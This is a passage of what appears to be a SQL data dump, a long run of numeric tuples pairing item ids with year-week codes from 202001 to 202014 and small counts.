,1),(2165,1,'202001',1),(2178,1,'202001',1),(2248,1,'202001',1),(2297,1,'202001',1),(2457,1,'202001',1),(2704,1,'202001',1),(468,1,'202001',2),(470,1,'202001',2),(1592,1,'202001',2),(1606,1,'202001',2),(1699,1,'202001',2),(1713,1,'202001',2),(1720,1,'202001',2),(1726,1,'202001',2),(1749,1,'202001',2),(1766,1,'202001',2),(2150,1,'202001',2),(1722,1,'202001',3),(2804,1,'202001',3),(2809,1,'202001',3),(2801,1,'202001',8),(2911,1,'202001',10),(2609,1,'202001',12),(2658,1,'202001',12),(2813,1,'202001',13),(2751,1,'202001',15),(2309,1,'202001',20),(472,1,'202002',1),(476,1,'202002',1),(478,1,'202002',1),(480,1,'202002',1),(481,1,'202002',1),(482,1,'202002',1),(483,1,'202002',1),(485,1,'202002',1),(486,1,'202002',1),(1584,1,'202002',1),(1586,1,'202002',1),(1588,1,'202002',1),(1590,1,'202002',1),(1594,1,'202002',1),(1596,1,'202002',1),(1602,1,'202002',1),(1606,1,'202002',1),(1610,1,'202002',1),(1614,1,'202002',1),(1695,1,'202002',1),(1715,1,'202002',1),(1741,1,'202002',1),(1743,1,'202002',1),(1745,1,'202002',1),(1768,1,'202002',1),(1772,1,'202002',1),(1776,1,'202002',1),(1778,1,'202002',1),(2063,1,'202002',1),(2152,1,'202002',1),(2161,1,'202002',1),(2252,1,'202002',1),(2293,1,'202002',1),(2296,1,'202002',1),(2297,1,'202002',1),(2617,1,'202002',1),(2748,1,'202002',1),(2769,1,'202002',1),(2775,1,'202002',1),(470,1,'202002',2),(474,1,'202002',2),(484,1,'202002',2),(1544,1,'202002',2),(1598,1,'202002',2),(1600,1,'202002',2),(1604,1,'202002',2),(1612,1,'202002',2),(1697,1,'202002',2),(1699,1,'202002',2),(1718,1,'202002',2),(1730,1,'202002',2),(1737,1,'202002',2),(1751,1,'202002',2),(1766,1,'202002',2),(2165,1,'202002',2),(2178,1,'202002',2),(2248,1,'202002',2),(2457,1,'202002',2),(468,1,'202002',3),(469,1,'202002',3),(473,1,'202002',3),(1582,1,'202002',3),(1713,1,'202002',3),(1720,1,'202002',3),(1728,1,'202002',3),(2159,1,'202002',3),(467,1,'202002',4),(1726,1,'202002',4),(1782,1,'202002',4),(2804,1,'202002',4),(471,1,'202002',5),(1701,1,'202002',5),(1774,1,'202002',7),(2751,1,'202002',8),(2911,1,'202002',8),(2801,1,'202002',10),(2813,1,'202002',14),(2309,1,'202002',15),(2658,1,'202002',15),(2609,1,'202002',19),(468,1,'202003',1),(470,1,'202003',1),(471,1,'202003',1),(476,1,'202003',1),(477,1,'202003',1),(480,1,'202003',1),(482,1,'202003',1),(483,1,'202003',1),(484,1,'202003',1),(486,1,'202003',1),(487,1,'202003',1),(488,1,'202003',1),(1582,1,'202003',1),(1584,1,'202003',1),(1602,1,'202003',1),(1604,1,'202003',1),(1610,1,'202003',1),(1695,1,'202003',1),(1701,1,'202003',1),(1713,1,'202003',1),(1718,1,'202003',1),(1720,1,'202003',1),(1722,1,'202003',1),(1724,1,'202003',1),(1726,1,'202003',1),(1728,1,'202003',1),(1734,1,'202003',1),(1741,1,'202003',1),(1745,1,'202003',1),(1747,1,'202003',1),(1749,1,'202003',1),(1770,1,'202003',1),(1774,1,'202003',1),(1780,1,'202003',1),(2148,1,'202003',1),(2150,1,'202003',1),(2152,1,'202003',1),(2154,1,'202003',1),(2156,1,'202003',1),(2165,1,'202003',1),(2252,1,'202003',1),(2296,1,'202003',1),(2558,1,'202003',1),(2704,1,'202003',1),(2769,1,'202003',1),(467,1,'202003',2),(469,1,'202003',2),(472,1,'202003',2),(473,1,'202003',2),(474,1,'202003',2),(478,1,'202003',2),(479,1,'202003',2),(485,1,'202003',2),(570,1,'202003',2),(1544,1,'202003',2),(1592,1,'202003',2),(1705,1,'202003',2),(1732,1,'202003',2),(1772,1,'202003',2),(1778,1,'202003',2),(2063,1,'202003',2),(2159,1,'202003',2),(2248,1,'202003',2),(2293,1,'202003',2),(2775,1,'202003',2),(2809,1,'202003',2),(1594,1,'202003',3),(1697,1,'202003',3),(1768,1,'202003',3),(2911,1,'202003',3),(1709,1,'202003',4),(1776,1,'202003',4),(2804,1,'202003',4),(2297,1,'202003',5),(2658,1,'202003',5),(2801,1,'202003',5),(2813,1,'202003',5),(2751,1,'202003',6),(1606,1,'202003',7),(2609,1,'202003',8),(2309,1,'202003',13),(1730,1,'202003',17),(470,1,'202004',1),(472,1,'202004',1),(474,1,'202004',1),(476,1,'202004',1),(477,1,'202004',1),(478,1,'202004',1),(479,1,'202004',1),(480,1,'202004',1),(482,1,'202004',1),(483,1,'202004',1),(484,1,'202004',1),(487,1,'202004',1),(488,1,'202004',1),(1584,1,'202004',1),(1586,1,'202004',1),(1590,1,'202004',1),(1596,1,'202004',1),(1600,1,'202004',1),(1604,1,'202004',1),(1697,1,'202004',1),(1701,1,'202004',1),(1703,1,'202004',1),(1705,1,'202004',1),(1713,1,'202004',1),(1720,1,'202004',1),(1726,1,'202004',1),(1728,1,'202004',1),(1734,1,'202004',1),(1737,1,'202004',1),(1745,1,'202004',1),(1747,1,'202004',1),(1749,1,'202004',1),(1751,1,'202004',1),(1768,1,'202004',1),(1772,1,'202004',1),(1774,1,'202004',1),(1776,1,'202004',1),(1778,1,'202004',1),(1780,1,'202004',1),(1782,1,'202004',1),(2150,1,'202004',1),(2154,1,'202004',1),(2165,1,'202004',1),(2248,1,'202004',1),(2252,1,'202004',1),(2296,1,'202004',1),(2658,1,'202004',1),(2704,1,'202004',1),(2748,1,'202004',1),(471,1,'202004',2),(473,1,'202004',2),(481,1,'202004',2),(485,1,'202004',2),(570,1,'202004',2),(1592,1,'202004',2),(1602,1,'202004',2),(1606,1,'202004',2),(1608,1,'202004',2),(1612,1,'202004',2),(1707,1,'202004',2),(1718,1,'202004',2),(1724,1,'202004',2),(1732,1,'202004',2),(1739,1,'202004',2),(1770,1,'202004',2),(2148,1,'202004',2),(2152,1,'202004',2),(2161,1,'202004',2),(2293,1,'202004',2),(2297,1,'202004',2),(2617,1,'202004',2),(2775,1,'202004',2),(2809,1,'202004',2),(2813,1,'202004',2),(468,1,'202004',3),(1588,1,'202004',3),(1598,1,'202004',3),(1699,1,'202004',3),(1722,1,'202004',3),(2769,1,'202004',3),(2801,1,'202004',3),(2911,1,'202004',3),(1582,1,'202004',4),(1743,1,'202004',4),(1766,1,'202004',4),(2609,1,'202004',4),(2178,1,'202004',5),(2309,1,'202004',5),(2457,1,'202004',5),(2804,1,'202004',5),(1730,1,'202004',15),(468,1,'202005',1),(470,1,'202005',1),(477,1,'202005',1),(481,1,'202005',1),(482,1,'202005',1),(486,1,'202005',1),(1544,1,'202005',1),(1584,1,'202005',1),(1592,1,'202005',1),(1596,1,'202005',1),(1598,1,'202005',1),(1602,1,'202005',1),(1610,1,'202005',1),(1612,1,'202005',1),(1614,1,'202005',1),(1699,1,'202005',1),(1701,1,'202005',1),(1703,1,'202005',1),(1705,1,'202005',1),(1718,1,'202005',1),(1728,1,'202005',1),(1734,1,'202005',1),(1739,1,'202005',1),(1741,1,'202005',1),(1743,1,'202005',1),(1745,1,'202005',1),(1751,1,'202005',1),(1766,1,'202005',1),(1768,1,'202005',1),(1776,1,'202005',1),(1780,1,'202005',1),(2156,1,'202005',1),(2159,1,'202005',1),(2248,1,'202005',1),(2293,1,'202005',1),(2296,1,'202005',1),(2457,1,'202005',1),(2558,1,'202005',1),(2769,1,'202005',1),(2775,1,'202005',1),(473,1,'202005',2),(474,1,'202005',2),(480,1,'202005',2),(1586,1,'202005',2),(1588,1,'202005',2),(1594,1,'202005',2),(1709,1,'202005',2),(1711,1,'202005',2),(1724,1,'202005',2),(1726,1,'202005',2),(1737,1,'202005',2),(1770,1,'202005',2),(1772,1,'202005',2),(1774,1,'202005',2),(1778,1,'202005',2),(2063,1,'202005',2),(2150,1,'202005',2),(2154,1,'202005',2),(2161,1,'202005',2),(2748,1,'202005',2),(471,1,'202005',3),(476,1,'202005',3),(1590,1,'202005',3),(1600,1,'202005',3),(1604,1,'202005',3),(1606,1,'202005',3),(1720,1,'202005',3),(2658,1,'202005',3),(2813,1,'202005',3),(2911,1,'202005',3),(487,1,'202005',4),(1582,1,'202005',4),(1713,1,'202005',4),(2751,1,'202005',4),(2809,1,'202005',4),(2801,1,'202005',5),(2609,1,'202005',7),(2804,1,'202005',8),(1722,1,'202005',11),(2309,1,'202005',11),(1730,1,'202005',14),(483,1,'202006',1),(1594,1,'202006',1),(1610,1,'202006',1),(1612,1,'202006',1),(1695,1,'202006',1),(1718,1,'202006',1),(1728,1,'202006',1),(2558,1,'202006',1),(2617,1,'202006',1),(2769,1,'202006',1),(2775,1,'202006',1),(2809,1,'202006',1),(467,1,'202006',2),(471,1,'202006',2),(477,1,'202006',2),(478,1,'202006',2),(480,1,'202006',2),(482,1,'202006',2),(485,1,'202006',2),(486,1,'202006',2),(1544,1,'202006',2),(1590,1,'202006',2),(1592,1,'202006',2),(1598,1,'202006',2),(1602,1,'202006',2),(1699,1,'202006',2),(1705,1,'202006',2),(1709,1,'202006',2),(1711,1,'202006',2),(1715,1,'202006',2),(1722,1,'202006',2),(1741,1,'202006',2),(1745,1,'202006',2),(1768,1,'202006',2),(1776,1,'202006',2),(1778,1,'202006',2),(2150,1,'202006',2),(2154,1,'202006',2),(2159,1,'202006',2),(2161,1,'202006',2),(2178,1,'202006',2),(2248,1,'202006',2),(2252,1,'202006',2),(2293,1,'202006',2),(2296,1,'202006',2),(2457,1,'202006',2),(2658,1,'202006',2),(2704,1,'202006',2),(2748,1,'202006',2),(472,1,'202006',3),(476,1,'202006',3),(481,1,'202006',3),(484,1,'202006',3),(570,1,'202006',3),(1582,1,'202006',3),(1584,1,'202006',3),(1596,1,'202006',3),(1600,1,'202006',3),(1608,1,'202006',3),(1697,1,'202006',3),(1707,1,'202006',3),(1732,1,'202006',3),(1739,1,'202006',3),(1747,1,'202006',3),(1749,1,'202006',3),(1751,1,'202006',3),(1770,1,'202006',3),(1772,1,'202006',3),(1780,1,'202006',3),(2063,1,'202006',3),(2148,1,'202006',3),(2165,1,'202006',3),(2297,1,'202006',3),(2801,1,'202006',3),(2804,1,'202006',3),(473,1,'202006',4),(479,1,'202006',4),(487,1,'202006',4),(1588,1,'202006',4),(1606,1,'202006',4),(1614,1,'202006',4),(1703,1,'202006',4),(1713,1,'202006',4),(1724,1,'202006',4),(1734,1,'202006',4),(1743,1,'202006',4),(1782,1,'202006',4),(2152,1,'202006',4),(2156,1,'202006',4),(2751,1,'202006',4),(2911,1,'202006',4),(468,1,'202006',5),(474,1,'202006',5),(488,1,'202006',5),(1586,1,'202006',5),(1604,1,'202006',5),(1730,1,'202006',5),(2813,1,'202006',5),(2956,1,'202006',5),(470,1,'202006',6),(1720,1,'202006',6),(1737,1,'202006',6),(1766,1,'202006',6),(1701,1,'202006',7),(469,1,'202006',8),(1726,1,'202006',8),(1774,1,'202006',8),(2609,1,'202006',12),(2309,1,'202006',30),(467,1,'202007',1),(477,1,'202007',1),(487,1,'202007',1),(1586,1,'202007',1),(1594,1,'202007',1),(1608,1,'202007',1),(1713,1,'202007',1),(1715,1,'202007',1),(1776,1,'202007',1),(2156,1,'202007',1),(2296,1,'202007',1),(2748,1,'202007',1),(469,1,'202007',2),(470,1,'202007',2),(474,1,'202007',2),(476,1,'202007',2),(478,1,'202007',2),(481,1,'202007',2),(485,1,'202007',2),(486,1,'202007',2),(1582,1,'202007',2),(1584,1,'202007',2),(1590,1,'202007',2),(1598,1,'202007',2),(1606,1,'202007',2),(1610,1,'202007',2),(1697,1,'202007',2),(1701,1,'202007',2),(1705,1,'202007',2),(1709,1,'202007',2),(1711,1,'202007',2),(1724,1,'202007',2),(1726,1,'202007',2),(1734,1,'202007',2),(1739,1,'202007',2),(1768,1,'202007',2),(1778,1,'202007',2),(1780,1,'202007',2),(2154,1,'202007',2),(2161,1,'202007',2),(2165,1,'202007',2),(2178,1,'202007',2),(2248,1,'202007',2),(2252,1,'202007',2),(2297,1,'202007',2),(2617,1,'202007',2),(2813,1,'202007',2),(468,1,'202007',3),(472,1,'202007',3),(473,1,'202007',3),(479,1,'202007',3),(480,1,'202007',3),(484,1,'202007',3),(1544,1,'202007',3),(1592,1,'202007',3),(1596,1,'202007',3),(1602,1,'202007',3),(1612,1,'202007',3),(1614,1,'202007',3),(1699,1,'202007',3),(1703,1,'202007',3),(1741,1,'202007',3),(1743,1,'202007',3),(1745,1,'202007',3),(1749,1,'202007',3),(1766,1,'202007',3),(1770,1,'202007',3),(1772,1,'202007',3),(471,1,'202007',4),(482,1,'202007',4),(483,1,'202007',4),(488,1,'202007',4),(1600,1,'202007',4),(1695,1,'202007',4),(1722,1,'202007',4),(1737,1,'202007',4),(1774,1,'202007',4),(2150,1,'202007',4),(2152,1,'202007',4),(2159,1,'202007',4),(2751,1,'202007',4),(2775,1,'202007',4),(2809,1,'202007',4),(1732,1,'202007',5),(2293,1,'202007',5),(2457,1,'202007',5),(2704,1,'202007',5),(2769,1,'202007',5),(2804,1,'202007',5),(2911,1,'202007',5),(2956,1,'202007',5),(1588,1,'202007',6),(1604,1,'202007',6),(1751,1,'202007',6),(2148,1,'202007',6),(2558,1,'202007',6),(2609,1,'202007',6),(1707,1,'202007',7),(1782,1,'202007',7),(2658,1,'202007',7),(1718,1,'202007',8),(1720,1,'202007',8),(1730,1,'202007',9),(1747,1,'202007',9),(2801,1,'202007',10),(570,1,'202007',11),(1728,1,'202007',11),(2309,1,'202007',16),(467,1,'202008',1),(476,1,'202008',1),(478,1,'202008',1),(479,1,'202008',1),(480,1,'202008',1),(481,1,'202008',1),(483,1,'202008',1),(484,1,'202008',1),(485,1,'202008',1),(486,1,'202008',1),(487,1,'202008',1),(488,1,'202008',1),(1544,1,'202008',1),(1590,1,'202008',1),(1592,1,'202008',1),(1594,1,'202008',1),(1598,1,'202008',1),(1602,1,'202008',1),(1614,1,'202008',1),(1695,1,'202008',1),(1703,1,'202008',1),(1707,1,'202008',1),(1709,1,'202008',1),(1715,1,'202008',1),(1724,1,'202008',1),(1732,1,'202008',1),(1734,1,'202008',1),(1743,1,'202008',1),(1745,1,'202008',1),(1770,1,'202008',1),(2150,1,'202008',1),(2152,1,'202008',1),(2156,1,'202008',1),(2161,1,'202008',1),(2178,1,'202008',1),(2248,1,'202008',1),(2558,1,'202008',1),(2748,1,'202008',1),(2809,1,'202008',1),(2965,1,'202008',1),(468,1,'202008',2),(470,1,'202008',2),(473,1,'202008',2),(474,1,'202008',2),(477,1,'202008',2),(570,1,'202008',2),(1586,1,'202008',2),(1596,1,'202008',2),(1608,1,'202008',2),(1610,1,'202008',2),(1697,1,'202008',2),(1701,1,'202008',2),(1705,1,'202008',2),(1713,1,'202008',2),(1720,1,'202008',2),(1726,1,'202008',2),(1737,1,'202008',2),(1739,1,'202008',2),(1749,1,'202008',2),(1766,1,'202008',2),(1774,1,'202008',2),(1776,1,'202008',2),(1780,1,'202008',2),(2154,1,'202008',2),(2293,1,'202008',2),(2296,1,'202008',2),(2297,1,'202008',2),(2769,1,'202008',2),(2813,1,'202008',2),(2956,1,'202008',2),(1582,1,'202008',3),(1600,1,'202008',3),(1604,1,'202008',3),(1699,1,'202008',3),(1728,1,'202008',3),(1741,1,'202008',3),(1751,1,'202008',3),(1768,1,'202008',3),(1778,1,'202008',3),(2063,1,'202008',3),(2148,1,'202008',3),(2159,1,'202008',3),(2252,1,'202008',3),(2617,1,'202008',3),(2804,1,'202008',3),(1588,1,'202008',4),(1612,1,'202008',4),(1722,1,'202008',4),(2658,1,'202008',4),(2751,1,'202008',4),(2775,1,'202008',4),(1718,1,'202008',5),(1747,1,'202008',5),(2911,1,'202008',5),(471,1,'202008',6),(1772,1,'202008',6),(2457,1,'202008',6),(2609,1,'202008',7),(2801,1,'202008',8),(1730,1,'202008',13),(2309,1,'202008',14),(468,1,'202009',1),(472,1,'202009',1),(478,1,'202009',1),(480,1,'202009',1),(481,1,'202009',1),(483,1,'202009',1),(484,1,'202009',1),(1582,1,'202009',1),(1592,1,'202009',1),(1598,1,'202009',1),(1602,1,'202009',1),(1612,1,'202009',1),(1614,1,'202009',1),(1699,1,'202009',1),(1703,1,'202009',1),(1707,1,'202009',1),(1709,1,'202009',1),(1726,1,'202009',1),(1743,1,'202009',1),(1766,1,'202009',1),(1770,1,'202009',1),(1772,1,'202009',1),(1776,1,'202009',1),(1780,1,'202009',1),(2063,1,'202009',1),(2150,1,'202009',1),(2154,1,'202009',1),(2156,1,'202009',1),(2159,1,'202009',1),(2165,1,'202009',1),(2252,1,'202009',1),(2809,1,'202009',1),(2964,1,'202009',1),(469,1,'202009',2),(470,1,'202009',2),(473,1,'202009',2),(474,1,'202009',2),(479,1,'202009',2),(485,1,'202009',2),(570,1,'202009',2),(1584,1,'202009',2),(1586,1,'202009',2),(1590,1,'202009',2),(1594,1,'202009',2),(1604,1,'202009',2),(1606,1,'202009',2),(1608,1,'202009',2),(1705,1,'202009',2),(1715,1,'202009',2),(1734,1,'202009',2),(1739,1,'202009',2),(1747,1,'202009',2),(1749,1,'202009',2),(1751,1,'202009',2),(1768,1,'202009',2),(2161,1,'202009',2),(2248,1,'202009',2),(2293,1,'202009',2),(2296,1,'202009',2),(2558,1,'202009',2),(2617,1,'202009',2),(2748,1,'202009',2),(2775,1,'202009',2),(2965,1,'202009',2),(2991,1,'202009',2),(3004,1,'202009',2),(3005,1,'202009',2),(3006,1,'202009',2),(471,1,'202009',3),(487,1,'202009',3),(1544,1,'202009',3),(1701,1,'202009',3),(1720,1,'202009',3),(1732,1,'202009',3),(1737,1,'202009',3),(1741,1,'202009',3),(1745,1,'202009',3),(1774,1,'202009',3),(1782,1,'202009',3),(2297,1,'202009',3),(2704,1,'202009',3),(2813,1,'202009',3),(2989,1,'202009',3),(2993,1,'202009',3),(467,1,'202009',4),(1713,1,'202009',4),(1718,1,'202009',4),(1722,1,'202009',4),(2457,1,'202009',4),(1697,1,'202009',5),(1724,1,'202009',5),(2152,1,'202009',5),(2658,1,'202009',5),(2751,1,'202009',5),(2911,1,'202009',5),(1596,1,'202009',6),(2148,1,'202009',6),(2804,1,'202009',6),(1600,1,'202009',7),(1730,1,'202009',7),(2178,1,'202009',7),(2769,1,'202009',7),(2956,1,'202009',7),(1588,1,'202009',9),(2801,1,'202009',10),(1728,1,'202009',12),(2609,1,'202009',12),(2309,1,'202009',15),(476,1,'202010',1),(1596,1,'202010',1),(1612,1,'202010',1),(1715,1,'202010',1),(1776,1,'202010',1),(2252,1,'202010',1),(3004,1,'202010',1),(3005,1,'202010',1),(469,1,'202010',2),(477,1,'202010',2),(478,1,'202010',2),(479,1,'202010',2),(480,1,'202010',2),(484,1,'202010',2),(485,1,'202010',2),(488,1,'202010',2),(1544,1,'202010',2),(1584,1,'202010',2),(1590,1,'202010',2),(1592,1,'202010',2),(1594,1,'202010',2),(1598,1,'202010',2),(1602,1,'202010',2),(1610,1,'202010',2),(1707,1,'202010',2),(1711,1,'202010',2),(1720,1,'202010',2),(1724,1,'202010',2),(1728,1,'202010',2),(1730,1,'202010',2),(1734,1,'202010',2),(1739,1,'202010',2),(1743,1,'202010',2),(1768,1,'202010',2),(1770,1,'202010',2),(1774,1,'202010',2),(1778,1,'202010',2),(1780,1,'202010',2),(2159,1,'202010',2),(2165,1,'202010',2),(2248,1,'202010',2),(2293,1,'202010',2),(2704,1,'202010',2),(2813,1,'202010',2),(2964,1,'202010',2),(2965,1,'202010',2),(3006,1,'202010',2),(467,1,'202010',3),(474,1,'202010',3),(481,1,'202010',3),(1586,1,'202010',3),(1608,1,'202010',3),(1614,1,'202010',3),(1697,1,'202010',3),(1703,1,'202010',3),(1718,1,'202010',3),(1737,1,'202010',3),(1745,1,'202010',3),(1751,1,'202010',3),(1782,1,'202010',3),(2154,1,'202010',3),(2296,1,'202010',3),(2297,1,'202010',3),(2558,1,'202010',3),(2617,1,'202010',3),(2658,1,'202010',3),(2748,1,'202010',3),(2775,1,'202010',3),(2801,1,'202010',3),(2804,1,'202010',3),(2809,1,'202010',3),(2989,1,'202010',3),(468,1,'202010',4),(470,1,'202010',4),(472,1,'202010',4),(482,1,'202010',4),(486,1,'202010',4),(487,1,'202010',4),(1604,1,'202010',4),(1695,1,'202010',4),(1699,1,'202010',4),(1701,1,'202010',4),(1705,1,'202010',4),(1713,1,'202010',4),(1726,1,'202010',4),(1741,1,'202010',4),(1749,1,'202010',4),(1766,1,'202010',4),(2063,1,'202010',4),(2150,1,'202010',4),(2156,1,'202010',4),(2161,1,'202010',4),(2769,1,'202010',4),(2991,1,'202010',4),(2993,1,'202010',4),(483,1,'202010',5),(1582,1,'202010',5),(1709,1,'202010',5),(1722,1,'202010',5),(1732,1,'202010',5),(1747,1,'202010',5),(1772,1,'202010',5),(2148,1,'202010',5),(2152,1,'202010',5),(3027,1,'202010',5),(3038,1,'202010',5),(473,1,'202010',6),(1606,1,'202010',6),(2178,1,'202010',6),(2457,1,'202010',6),(3030,1,'202010',6),(471,1,'202010',7),(570,1,'202010',7),(3023,1,'202010',7),(2751,1,'202010',8),(2956,1,'202010',8),(1588,1,'202010',9),(2911,1,'202010',9),(3034,1,'202010',11),(1600,1,'202010',12),(2609,1,'202010',15),(2309,1,'202010',28),(468,1,'202011',1),(473,1,'202011',1),(478,1,'202011',1),(479,1,'202011',1),(480,1,'202011',1),(481,1,'202011',1),(485,1,'202011',1),(488,1,'202011',1),(1544,1,'202011',1),(1586,1,'202011',1),(1594,1,'202011',1),(1596,1,'202011',1),(1598,1,'202011',1),(1602,1,'202011',1),(1604,1,'202011',1),(1610,1,'202011',1),(1705,1,'202011',1),(1711,1,'202011',1),(1720,1,'202011',1),(1726,1,'202011',1),(1728,1,'202011',1),(1732,1,'202011',1),(1737,1,'202011',1),(1747,1,'202011',1),(1766,1,'202011',1),(1768,1,'202011',1),(1772,1,'202011',1),(2063,1,'202011',1),(2152,1,'202011',1),(2154,1,'202011',1),(2558,1,'202011',1),(2617,1,'202011',1),(2809,1,'202011',1),(2813,1,'202011',1),(2911,1,'202011',1),(2965,1,'202011',1),(3005,1,'202011',1),(3041,1,'202011',1),(471,1,'202011',2),(476,1,'202011',2),(477,1,'202011',2),(486,1,'202011',2),(487,1,'202011',2),(1582,1,'202011',2),(1590,1,'202011',2),(1592,1,'202011',2),(1608,1,'202011',2),(1614,1,'202011',2),(1703,1,'202011',2),(1713,1,'202011',2),(1722,1,'202011',2),(1745,1,'202011',2),(1770,1,'202011',2),(1780,1,'202011',2),(1782,1,'202011',2),(2150,1,'202011',2),(2159,1,'202011',2),(2178,1,'202011',2),(2252,1,'202011',2),(2658,1,'202011',2),(2748,1,'202011',2),(2956,1,'202011',2),(2964,1,'202011',2),(1707,1,'202011',3),(1715,1,'202011',3),(1743,1,'202011',3),(1749,1,'202011',3),(1778,1,'202011',3),(2165,1,'202011',3),(3030,1,'202011',3),(467,1,'202011',4),(469,1,'202011',4),(470,1,'202011',4),(474,1,'202011',4),(1709,1,'202011',4),(1741,1,'202011',4),(1776,1,'202011',4),(2751,1,'202011',4),(2769,1,'202011',4),(2775,1,'202011',4),(2801,1,'202011',4),(2993,1,'202011',4),(3004,1,'202011',4),(3023,1,'202011',4),(3027,1,'202011',4),(3034,1,'202011',4),(1695,1,'202011',5),(1697,1,'202011',5),(2148,1,'202011',5),(2804,1,'202011',5),(2989,1,'202011',6),(2991,1,'202011',6),(482,1,'202011',7),(1588,1,'202011',7),(3038,1,'202011',8),(1730,1,'202011',9),(1606,1,'202011',10),(2309,1,'202011',16),(2609,1,'202011',16),(1600,1,'202011',21),(467,1,'202012',1),(1590,1,'202012',1),(1602,1,'202012',1),(1608,1,'202012',1),(1715,1,'202012',1),(1772,1,'202012',1),(2159,1,'202012',1),(2248,1,'202012',1),(2252,1,'202012',1),(2617,1,'202012',1),(2809,1,'202012',1),(2991,1,'202012',1),(469,1,'202012',2),(471,1,'202012',2),(473,1,'202012',2),(474,1,'202012',2),(476,1,'202012',2),(478,1,'202012',2),(479,1,'202012',2),(480,1,'202012',2),(486,1,'202012',2),(487,1,'202012',2),(1586,1,'202012',2),(1594,1,'202012',2),(1596,1,'202012',2),(1703,1,'202012',2),(1705,1,'202012',2),(1711,1,'202012',2),(1718,1,'202012',2),(1720,1,'202012',2),(1739,1,'202012',2),(1745,1,'202012',2),(1749,1,'202012',2),(1751,1,'202012',2),(2156,1,'202012',2),(2658,1,'202012',2),(2804,1,'202012',2),(2964,1,'202012',2),(2965,1,'202012',2),(3006,1,'202012',2),(3041,1,'202012',2),(470,1,'202012',3),(482,1,'202012',3),(484,1,'202012',3),(488,1,'202012',3),(1544,1,'202012',3),(1592,1,'202012',3),(1604,1,'202012',3),(1695,1,'202012',3),(1699,1,'202012',3),(1707,1,'202012',3),(1728,1,'202012',3),(1743,1,'202012',3),(1747,1,'202012',3),(1768,1,'202012',3),(1770,1,'202012',3),(1776,1,'202012',3),(1778,1,'202012',3),(2150,1,'202012',3),(2154,1,'202012',3),(2457,1,'202012',3),(2558,1,'202012',3),(2704,1,'202012',3),(2911,1,'202012',3),(2989,1,'202012',3),(3004,1,'202012',3),(3005,1,'202012',3),(472,1,'202012',4),(483,1,'202012',4),(485,1,'202012',4),(1584,1,'202012',4),(1600,1,'202012',4),(1612,1,'202012',4),(1709,1,'202012',4),(1722,1,'202012',4),(1724,1,'202012',4),(1726,1,'202012',4),(1741,1,'202012',4),(1774,1,'202012',4),(1780,1,'202012',4),(2148,1,'202012',4),(2178,1,'202012',4),(2293,1,'202012',4),(2296,1,'202012',4),(2751,1,'202012',4),(2769,1,'202012',4),(2775,1,'202012',4),(2956,1,'202012',4),(2993,1,'202012',4),(3045,1,'202012',4),(481,1,'202012',5),(570,1,'202012',5),(1606,1,'202012',5),(1701,1,'202012',5),(1730,1,'202012',5),(1732,1,'202012',5),(1734,1,'202012',5),(1782,1,'202012',5),(2152,1,'202012',5),(2161,1,'202012',5),(2165,1,'202012',5),(2309,1,'202012',5),(2748,1,'202012',5),(2801,1,'202012',5),(3027,1,'202012',5),(3038,1,'202012',5),(1766,1,'202012',6),(3023,1,'202012',6),(468,1,'202012',7),(1582,1,'202012',7),(1713,1,'202012',7),(1737,1,'202012',7),(2609,1,'202012',7),(2813,1,'202012',7),(3034,1,'202012',9),(1588,1,'202012',10),(3030,1,'202012',10),(1614,1,'202012',11),(1598,1,'202012',14),(476,1,'202013',1),(479,1,'202013',1),(488,1,'202013',1),(1544,1,'202013',1),(1590,1,'202013',1),(1598,1,'202013',1),(1612,1,'202013',1),(1699,1,'202013',1),(1701,1,'202013',1),(1713,1,'202013',1),(1724,1,'202013',1),(1726,1,'202013',1),(1737,1,'202013',1),(1739,1,'202013',1),(1749,1,'202013',1),(1751,1,'202013',1),(1766,1,'202013',1),(1770,1,'202013',1),(1772,1,'202013',1),(1776,1,'202013',1),(2063,1,'202013',1),(2152,1,'202013',1),(2156,1,'202013',1),(2165,1,'202013',1),(2248,1,'202013',1),(2558,1,'202013',1),(2748,1,'202013',1),(2965,1,'202013',1),(467,1,'202013',2),(469,1,'202013',2),(470,1,'202013',2),(477,1,'202013',2),(481,1,'202013',2),(482,1,'202013',2),(485,1,'202013',2),(570,1,'202013',2),(1584,1,'202013',2),(1592,1,'202013',2),(1594,1,'202013',2),(1610,1,'202013',2),(1697,1,'202013',2),(1705,1,'202013',2),(1709,1,'202013',2),(1711,1,'202013',2),(1720,1,'202013',2),(1734,1,'202013',2),(1778,1,'202013',2),(2148,1,'202013',2),(2150,1,'202013',2),(2161,1,'202013',2),(2804,1,'202013',2),(2809,1,'202013',2),(2964,1,'202013',2),(3004,1,'202013',2),(3005,1,'202013',2),(3006,1,'202013',2),(3023,1,'202013',2),(3041,1,'202013',2),(472,1,'202013',3),(474,1,'202013',3),(478,1,'202013',3),(483,1,'202013',3),(484,1,'202013',3),(1586,1,'202013',3),(1596,1,'202013',3),(1602,1,'202013',3),(1606,1,'202013',3),(1703,1,'202013',3),(1715,1,'202013',3),(1732,1,'202013',3),(1741,1,'202013',3),(1743,1,'202013',3),(1747,1,'202013',3),(1768,1,'202013',3),(1780,1,'202013',3),(2293,1,'202013',3),(2296,1,'202013',3),(2297,1,'202013',3),(2617,1,'202013',3),(2769,1,'202013',3),(2911,1,'202013',3),(2956,1,'202013',3),(2991,1,'202013',3),(2993,1,'202013',3),(468,1,'202013',4),(480,1,'202013',4),(1582,1,'202013',4),(1604,1,'202013',4),(1614,1,'202013',4),(1718,1,'202013',4),(1728,1,'202013',4),(1745,1,'202013',4),(1782,1,'202013',4),(2154,1,'202013',4),(2252,1,'202013',4),(2989,1,'202013',4),(3045,1,'202013',4),(487,1,'202013',5),(1722,1,'202013',5),(1730,1,'202013',5),(1774,1,'202013',5),(2457,1,'202013',5),(2813,1,'202013',5),(3038,1,'202013',5),(473,1,'202013',6),(1695,1,'202013',6),(2178,1,'202013',6),(2775,1,'202013',6),(3030,1,'202013',6),(1608,1,'202013',7),(2658,1,'202013',7),(3034,1,'202013',7),(2309,1,'202013',10),(2609,1,'202013',12),(1588,1,'202013',13),(2801,1,'202013',14),(1600,1,'202013',19),(2751,1,'202013',19),(480,1,'202014',1),(483,1,'202014',1),(485,1,'202014',1),(570,1,'202014',1),(1728,1,'202014',1),(1741,1,'202014',1),(1751,1,'202014',1),(1782,1,'202014',1),(468,1,'202014',2),(482,1,'202014',2),(484,1,'202014',2),(486,1,'202014',2),(487,1,'202014',2),(488,1,'202014',2),(1544,1,'202014',2),(1584,1,'202014',2),(1602,1,'202014',2),(1718,1,'202014',2),(1726,1,'202014',2),(1732,1,'202014',2),(1734,1,'202014',2),(1743,1,'202014',2),(1747,1,'202014',2),(1770,1,'202014',2